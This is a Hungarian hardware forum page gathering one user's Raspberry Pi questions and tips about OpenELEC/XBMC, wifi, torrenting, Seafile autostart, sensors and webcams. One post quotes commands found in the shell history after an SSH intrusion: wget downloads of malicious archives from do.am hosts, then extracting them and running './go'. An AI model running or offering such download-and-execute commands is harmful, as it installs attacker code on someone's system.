- Samsung Galaxy A56 - megbízható középszerűség
- Nothing Phone (3a) és (3a) Pro - az ügyes meg sasszemű
- One mobilszolgáltatások
- Mi nincs, grafén akku van: itt a Xiaomi 11T és 11T Pro
- VoLTE/VoWiFi
- Mobil flották
- Xiaomi 15 - kicsi telefon nagy energiával
- Google Pixel 8a - kis telefon kis késéssel
- Samsung Galaxy S25 - végre van kicsi!
- Milyen okostelefont vegyek?
-
Mobilarena
Amit érdemes tudni a Raspberry Pi-kről:
A legelső változat 2012-ben jelent meg. Pici, olcsó és nagyon alacsony fogyasztású, hobby-célú kártyagép. Felépítése ARM alapú, nem PC-architektúra, hanem kb. egy régi mobilhoz hasonló. Nagyon sok mindenre használható! A Linux-nak és a magas eladási mennyiségnek köszönhetően jelentős fejlesztőtáborral rendelkezik.
Új hozzászólás Aktív témák
-
csimpas
tag
Sziasztok
Az utóbbi hónapokban sajnos nem sok időm volt foglalkozni a PI-al, most szépen meg is adta magát a rendszer...
Openelec és Raspbian van fent, amiből a raspbian elszállt. Tehát újra kell telepítenem sajnos.
Pár hete pont belefutottam egy olyan hozzászólásba hogy kell valami Kodi (ezt nem tudom hogy micsoda, számomra újdonság) meg valami kiegészítő az Openelec - hez, és akkor a videó megosztó oldalakról lehet filmet nézni.
Ezeket keresném, ha tudnátok adni egy kis telepítési infót, hogy hogyan lehet beüzemelni, azt nagyon megköszönném!
-
csimpas
tag
válasz
MaCS_70 #9860 üzenetére
hátha ad egy kis ötletet:
én vettem egy ilyet, igaz hogy nem zenehallgatás céljából, de ha már megvolt, pythonban összedobtam egy olyat, hogy ha beírtam hogy 11# akkor szólt a class fm , 12# music fm, stb (persze netről), xy-ra reboot, stb stb
valószínű hogy meglehet oldani hogy a zene mappáidon belül random, vagy lejátszási sorrendben is lejátsza a zenét, esetleg léptetni is lehessen, így nem kell tv a zenéhez.
nekem nem billeg a hub, tv alatt van, meg sem mozdul
-
csimpas
tag
nekem egy ilyen aktív usb hub-on van egy 500 gigás vinyó,ugyan ez a hub a sparba 3500 huf...)
csak 1080p-s filmeket töltök,transmission-daemon-al. van hogy 5-6 jön le egyszerre,nagy gond sosem volt még, van hogy 30-40 torrent van seed-be, nem tapasztaltam még hibát. persze előfordul hogy fagyogat, de azt úgyis észreveszed, de nem nagyon jellemző, fagyásnál áram ki-be és tölt továbbamikor seedel, akkor meg egyáltalán nem tapasztaltam problémát
-
csimpas
tag
nekem valami oknál fogva, nagyon lassú az openvpn ,kb 0.5 Mb ha csatlakozom
van esetleg valami mód rá hogy gyorsabb legyen?
legalább annyira gyors, hogy youtube működjön.használ valaki TV GO-t? hogyan lehetne raspberry-n működtetni?
-
csimpas
tag
sziasztok
gondolkozom egy 7 colos érintőképernyő vételén.
igazából csak egy jukebox futna alatta, dos alatt.
szerintetek működhet az érintő kijelző dos alatt?
-
csimpas
tag
válasz
sad_Vamp #9150 üzenetére
érdekes dolog történt
nem tudtam ssh-n belépni a pi felhasználóval,a régi jelszavammal, majd root ként megváltoztattam a pi user jelszavát, beléptem pi felhasználóként, puttyban felfele nyíl, és egy csomó olyan parancs volt kiadva, amit nem én adtam ki, és más rajtam kívűl nem használja a raspberry-t...
wget prg.do.am/milan.tgz
wget prg.do.am/milan.tgzwget prg.do.am/milan.tgz
wget database.do.am/loginIRC/newbnc.tgz; tar xzvf newbnc.tgz; cd .new ; ./goilyen parancsok lettek kiadva
ilyenkor wtf van?
szerk:22es port nyitva volt
-
csimpas
tag
Dts hang openelec alatt, xbmc-n vajon miért szaggat? Megvettem a vc1 és mpeg2 kodeket, mégis szaggat a film. Mit kellene állítani hogy normálisan menjen a dts kodolású film?
-
csimpas
tag
Sziasztok
Most futok bele harmadjára abba a hibába, hogy Raspbian alatt, reboot után, a Pi elkezd tölteni, majd a kurzor a bal felső sarokban csak villog... Utána se kép se hang, csak a kurzor villog továbbra is.
Mi lehet a gond? Mert eddig mindig újratelepítettem, de háta van valami más megoldás is rá. Most legutóbb kb 2-3 hetet ment el stabilan, újratelepítés után.
Transmission, openvpn, wicd-curses, kamera motion futott csak a pi-n
-
csimpas
tag
Tudnátok adni egy openelec működő configot?
Valamiért a blurayt most szaggatottan játsza le az xbmc :s
-
-
csimpas
tag
kis segítséget szeretnék kérni SeaFile automatikus indulással kapcsolatban
pi felhasználó alatt a seafile_installed/seafile-server-2.1.5 mappában van
sudo /home/pi/seafile_installed/seafile-server-2.1.5/seafile.sh start
illetve
sudo /home/pi/seafile_installed/seafile-server-2.1.5/seahub.sh startezekkel indul.
próbáltam úgy rábírni az automatikus indulásra hogy:
sudo crontab -e
majd beírtam/mentettem ezt a 2 sort:
@reboot sudo /home/pi/seafile_installed/seafile-server-2.1.5/seafile.sh start
@reboot sudo /home/pi/seafile_installed/seafile-server-2.1.5/seahub.sh startmentés
reboot, de nem indul automatikusan...
kisegítenétek némi infóval?
-
csimpas
tag
vc1 kódolású bluraynél, ha nincs meg a vc1 licence, akkor csak hang van, kép nincs.
-
csimpas
tag
válasz
V.Stryker #7336 üzenetére
én vettem egy ilyen távirányítót
ezzel "váltottam le" a tv távirányítóját
tökéletesen működik OpenElec alatt, (RaspBMC alatt is)
és egy kicsivel gyorsabban is megy a gépelés pl ha youtube videót akarok böngészni...2 kis ceruzaelemmel működik, de mióta megvan, még nem cseréltem elemet benne, van benne vmi védelmi funkció, 1 perc után off-olja magát, ha 2x megnyomok bármilyen gombot akkor lesz újra aktív.
van play, pause , www, stb gombok rajta
gyönyörűen kézre is áll, én mindenképp javaslok egy ilyet azoknak, akik openelecet használnak.kép:
-
csimpas
tag
válasz
mrgreen #7249 üzenetére
nekem openvpn , transmission, seafile, apache2, mysql ,és ftp fut raspbian alatt.
a fent említett dolgok nekem szépen mennek, bár ha a phpmyadmin-ba belépek, akkor érzek némi lassulást, esetleg ha mysql adatbázist használ egy weboldal, akkor ott is van némi lassulás, tehát lassabban töltődik be a weboldal, pl egy wordpress vagy seafile. próbálkoztam lighttpd-vel is, de nekem ott rend szerint összefosta magát a mysql.
transmission-re és openvpn-re nincs panaszom, ezek nagyon szépen futnak.
filmet, általában bd25 vagy 1080p mkv-ban nézek, de kizárólag openelec alatt, egy 2,5 colos vinyóval, ami a pi-re van kötve (tehát nem hálózaton) egyszer sem tapasztaltam akadást eddig.
vc1 kódeket megvettem, így a vc1 kódolású bluray is tökéletesen megy. -
csimpas
tag
válasz
balaaa88 #7149 üzenetére
nekem ez oldotta meg a wifi szétkapcsolást:
(nekem reboot után mindig rá kellett nyomnom a wifi configban a connectre)
sudo apt-get install wicd-curses
majd ha feltelepítette:
sudo wicd-curses
jobbra nyíl azon a hálózaton amihez kapcsolódni akarsz, majd tegyél egy X-et az automatikus kapcsolódáshoz. -
csimpas
tag
transmission-t cserélném rtorrent-re, de nem találok semmi kézzelfogható tutorialt...
valaki esetleg tudna segíteni 1 linkkel pl -
csimpas
tag
OpenELEC xbmc-n, mitől van az, hogy eltűntek a film borítók?
belépek a film kiegészítőkbe, ott meg a lista tök üres.
netre csatlakozva van, ma újra újra telepítettem az OpenELEC-et, előtte formáztam az sd kártyát hátha... de ugyan az, nincsenek borítók, valamiért nem szedi le a borítókat, és a film kiegészítő alatti lista is üres
(alul az rss infó sem fut)
valakinek ötlet? -
csimpas
tag
Nekem most a wifi ment el... XBMC alatt tökéletes, rasbian alatt meg felkapcsolodik a wifire, aztán disconect
Nincs valakinek ötlete? -
csimpas
tag
akkus megoldást egyébként ki hogy oldotta meg a pi-re?
-
csimpas
tag
fswebcam zöld vagy épp fekete képre van valami gyógyír?
-
csimpas
tag
ha már hőmérséklet, ez a problémám
mit ajánlotok, mivel mérjem ki az adatokat? -
csimpas
tag
ez szerint állítanám be a dht22 szenzort, lefuttatom ezt:
$ git clone git://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code.git
$ cd Adafruit-Raspberry-Pi-Python-Code
$ cd Adafruit_DHT_Drivermajd kiadom a
sudo ./Adafruit_DHT 22 7 parancsot (7-es gpio-ra van kötve a szenzor)és csak ezt dobja vissza:
pi@raspberrypi ~/Adafruit-Raspberry-Pi-Python-Code/Adafruit_DHT_Driver $ sudo ./Adafruit_DHT 22 7
Using pin #7
Data (36): 0x2 0x70 0xe 0xf9 0x7csak a data-t, de nincs celcius, mit csinálok rosszul?
-
csimpas
tag
leszedtem a NOOBS_v1_3_3 -at és felraktam a raspbian-t, azóta ha rebootolok, nem csatlakozik fel automatikusan wifire, mindig rá kell nyomni a connect gombra, a v1_3_2-nél nem volt ilyen gondom, mit javasoltok, mit kellene csinálnom hogy automatikusan kapcsolódjon?
-
csimpas
tag
válasz
PumpkinSeed #6515 üzenetére
Hasonló gondom volt, ssh-n a top parancsnál nézd meg mi zabálja a procit, nekem a motion volt a ludas, lelőttem és utána szépen ment a torrent (transmission)
-
csimpas
tag
válasz
lord.lakli #6502 üzenetére
a hubra van kötve a 2,5 colos hdd usbn-n, és mellé van kötve a PI. ennyi van a hubra kötve
minden más usb a pi-re van kötve ( egy passzív hubra) -
csimpas
tag
válasz
beloadjoker #6498 üzenetére
nekem egy aktív usb hub-ra van kötve a vinyó mellé, eddigi tapasztalat az, hogy simán elbírja a hub a vinyót is, meg a raspberryt is, mellé van még kötve 1 usb kamera, 1 relé, 1 usb bill, 1 usb egér, 1 wifi stick
-
csimpas
tag
hátha még nem volt
http://www.openremote.com/ -
csimpas
tag
feltennék egy nagyon láma kérdést
van egy 8 portos relém, meg van egy keypadom, amit a gpio pinekre kellene rátennem
hogyan lehetne ezt kivitelezni? magyarán hogyan tudnám bővíteni ezeket a gpio pineket hogy a keypad is és a relé is működjön?
mert ha rákötöm a relét, nem marad elég pin a keypadnak -
csimpas
tag
eléggé döcögősen megy a transmission nekem, pc-n transmission remote guival nézem, és eltűnik-visszajön , weben alig tölt be a webes felület. nincs valakinek ötlete?
ezek a system adatok:
CPU Load 43.7%
CPU Temperature 48.7°C
Uptime 00:18 (hh:mm)Memory: 383,712 kB
Used 359,680 kB94%
Free 24,032 kB
6%
Buffered 460 kB
0%
Cached 226,876 kB
59%Swap: 102,396 kB
Used 0 kB
0%
Free 102,396 kB
100% -
csimpas
tag
válasz
sanchomuzax #6399 üzenetére
nekem az egyik masina nem lesz netre kötve, ezért kell, csak még mindig nem tudom mit hova kell forrasztani
-
csimpas
tag
RTC beforrasztásra és beüzemeléshez, tudnátok adni egy kis instrukciót? hogy mit hova kell forrasztani stb.
-
csimpas
tag
válasz
Cyber_Bird #6340 üzenetére
-
csimpas
tag
ez alapján tenném fel az mjpg-streamer-t. de amikor eljutok a lépéseknél ide:
svn co https://mjpg-streamer.svn.sourceforge.net/svnroot/mjpg-streamer mjpg-streamerakkor ezt a hibaüzenetet kapom:
svn: E175011: Repository moved permanently to 'https://svn.code.sf.net/p/mjpg-streamer/code/!svn/vcc/default'; please relocatemit lehetne ezzel kezdeni?
próbáltam ez alapján is a telepítést, mert itt nincs "svn co". de itt meg ha megnyitom az urlt, akkor nincs kamera kép, csak ez kép
illetve a kamerán sem kapcsol be a led.tökéletes lenne nekem a motion-is, de ott meg valamiért csak 2 másodpercenként frissül a kép, nem folyamatos
-
csimpas
tag
válasz
wassermann #6320 üzenetére
úgy gondoltam hogy szét van már szedve a kijelző, csak a kábelek lógnak ki
-
csimpas
tag
lehet hogy hülye kérdés, de van egy hordozható dvd lejátszóm, annak az lcd kijelzőjét szerintetek rá tudnám kötni a Raspberry-re? ha igen, akkor mi kell hozzá?
-
csimpas
tag
sziasztok
tervezem már egy jó ideje hogy én is veszek egy raspberry pi-t.
viszont 1-2 dolog nem tiszta számomra, ebben kérném a segítségeteket.szeretnék én is egy hasonló hőmérséklet szenzort, mint amit vzoltan linkelt itt
nem tiszta számomra, hogy hogyan történik a szenzorok elhelyezése? körbe van drótozva a ház? vagy hogyan van megoldva?
illetve szeretnék egy raspberry kameramodult is, de ahogy egy webáruházban néztem, kb 10cm kábel van a kamerához, és nyilván a raspberry-t nem ott szeretném elhelyezni ahol a kamera lenne, így az a kérdésem, hogy hogyan lehet a kamera kábelét hosszabbítani?
továbbá távolról szeretném az egyik helységnek a villanyát le-fel kapcsolni, ehhez milyen modult ajánlotok?
remélem nem kérdeztem hülyeségeket
csak számomra ezek még valahogy nincsenek képben
köszi
Új hozzászólás Aktív témák
Hirdetés
- Argos: Szeretem az ecetfát
- RAM topik
- Intel Core i3 / i5 / i7 / i9 10xxx "Comet Lake" és i3 / i5 / i7 / i9 11xxx "Rocket Lake" (LGA1200)
- sziku69: Fűzzük össze a szavakat :)
- Vicces képek
- Intel Core i5 / i7 / i9 "Alder Lake-Raptor Lake/Refresh" (LGA1700)
- Kivégzi a Firewire-t az új macOS verzió?
- World of Tanks - MMO
- Kertészet, mezőgazdaság topik
- Android játékok topikja
- További aktív témák...
- Apple M4 Mac Mini 256GG, 16GB Eladó
- ÁRGARANCIA! Épített KomPhone i7 14700KF 32/64GB RAM RTX 5090 32GB GAMER PC termékbeszámítással
- ÁRGARANCIA! Épített KomPhone Ryzen 7 7800X3D 32/64GB RAM RTX 5090 32GB GAMER PC termékbeszámítással
- ÁRGARANCIA! Épített KomPhone i9 14900KF 64GB RAM RTX 5090 32GB GAMER PC termékbeszámítással
- HP EliteDesk 705 G3 MT AMD PRO A10-8770/8GB RAM/120 GB SSD/250 GB HDD
- Új! HP 230 Vezetéknélküli USB-s Billentyűzet
- BESZÁMÍTÁS! Asus ROG Flow Z13 + ROG XG RTX 3070 - i9 12900H 16GB DDR5 RAM 1TB SSD + RTX 3070 8GB WIN
- Dell OptiPlex MT/SFF 3040, 3050, 7050, 3060, 3070, 5070, 7060 /WIN 11 - SZÁMLA- GARANCIA
- Új Apple iPhone 16e 128GB, Kártyafüggetlen, 3 Év Garanciával
- Jo Nesbo: LEOPÁRD (nem olvasott)
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft
Város: Budapest
Cég: Promenade Publishing House Kft.
Város: Budapest